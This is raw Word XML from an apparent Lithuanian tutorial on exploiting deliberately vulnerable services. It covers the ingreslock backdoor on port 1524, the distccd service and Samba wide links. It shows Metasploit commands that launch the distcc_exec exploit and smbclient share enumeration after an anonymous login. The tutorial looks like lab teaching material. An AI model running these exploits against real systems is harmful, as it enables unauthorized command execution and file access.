      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Daug mažiau subtilus yra senas laukimo (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>standby</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>) "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ingreslock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Backdoor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. Ji naudoja 1524 prieigą (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Ingreslock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> prieiga buvo labai populiarus pasirinkimas kai prieš dešimtmetį </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Backdoor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> diegdavo į serverius. Ją gauti labai paprasta:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B82DAC" w14:textId="59A01C42" w:rsidR="00CC09C3" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E68F713" w14:textId="77777777" w:rsidR="00607DC0" w:rsidRPr="00607DC0" w:rsidRDefault="00607DC0" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19BCFAAD" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc258656092"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Paslaugos:netyčiniai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Backdoors</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="01E97480" w14:textId="69EFA4CC" w:rsidR="00CC09C3" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61C15730"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29920472" w14:textId="77777777" w:rsidR="00607DC0" w:rsidRDefault="00607DC0" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="579A605D" w14:textId="77777777" w:rsidR="00607DC0" w:rsidRPr="00607DC0" w:rsidRDefault="00607DC0" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B84A729" w14:textId="77777777" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00B958F8"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B958F8" w:rsidRPr="00607DC0" w14:paraId="22A511CE"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3B0DB739"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183ACBB1"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B958F8" w:rsidRPr="00607DC0" w14:paraId="13573337" w14:textId="77777777" w:rsidTr="003C0B7F">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="31A8D0C5"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345DF39A" w14:textId="77777777" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00B958F8" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B958F8" w:rsidRPr="00607DC0" w14:paraId="0086B746" w14:textId="77777777" w:rsidTr="003C0B7F">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="13547769"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2A75B3FD" w14:textId="77777777" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00B958F8" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4B319B0C" w14:textId="77777777" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00B958F8" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74270812" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="186D95E0" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Be žalingų </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Backdoors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> yra ir paslaugos kurie pagal savo prigimtį yra pažeidžiami. Pirmasis iš jų yra įdiegtas IP - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>distccd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. Ši programa leidžia lengvai paskirstyti didelį kompiliatoriaus darbą įvairiose sistemos. Šios paslaugos problema yra ta, kad hakeris gali lengvai piktnaudžiauti ją, paleisti komandas su atitinkamais pasirinkimas (raktais).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1B7C2E" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C77C755"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 xml:space="preserve">:~# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3A26BA75" w14:textId="2BD8EA05" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ACBE547"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&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>misc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>distcc_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7B27DFA2"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>distcc_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">) &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> RHOST IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BB3A05"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>distcc_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">) &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00ADA883" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21266323" w14:textId="513ABB1B" w:rsidR="00CC09C3" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C13833A"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5528DF83" w14:textId="77777777" w:rsidR="00607DC0" w:rsidRPr="00607DC0" w:rsidRDefault="00607DC0" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B019BDD" w14:textId="77777777" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00B958F8"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B958F8" w:rsidRPr="00607DC0" w14:paraId="22BC8074"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57C5269B"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4166E06D" w14:textId="77777777" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00B958F8"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B958F8" w:rsidRPr="00607DC0" w14:paraId="399CE03C" w14:textId="77777777" w:rsidTr="003C0B7F">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3498A73A"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5F5421AD" w14:textId="77777777" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00B958F8" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B958F8" w:rsidRPr="00607DC0" w14:paraId="61C1EB4A" w14:textId="77777777" w:rsidTr="003C0B7F">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="52533756" w14:textId="77777777" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00B958F8"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5D7EBA67" w14:textId="77777777" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00B958F8" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="69F3C818" w14:textId="485025B9" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00B958F8" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45C3FE5A" w14:textId="77777777" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00B958F8" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58B5FC5F" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Samba, kai sukonfigūruotas priėjimas su rašymo galimybe ir " </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>wide</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> links plačiosios nuorodos" yra leidžiamas (pagal nutylėjimą).  Gali būti naudojamas kaip slaptas priėjimas prie failų, kurie nebuvo skirti dalijimuisi (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>share</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">). Žemiau pavyzdyje naudojamas </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> modulį suteikti prieigą prie šakninės failų sistemos, naudojant anoniminį prisijungimą su įrašymo galimybę.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589FB8DE" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0283F179"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w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> -L //IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD353C0" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Anonymous</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>successful</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3840A759" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Domain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>=[WORKGROUP] OS=[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>] Server=[Samba 3.0.20-Debian]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2360CD76" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B6F052" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Sharename</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">       Type      </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Comment</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2C2E6C6E" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>        ---------       ----      -------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C028E5B" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">$          Disk      </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Printer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
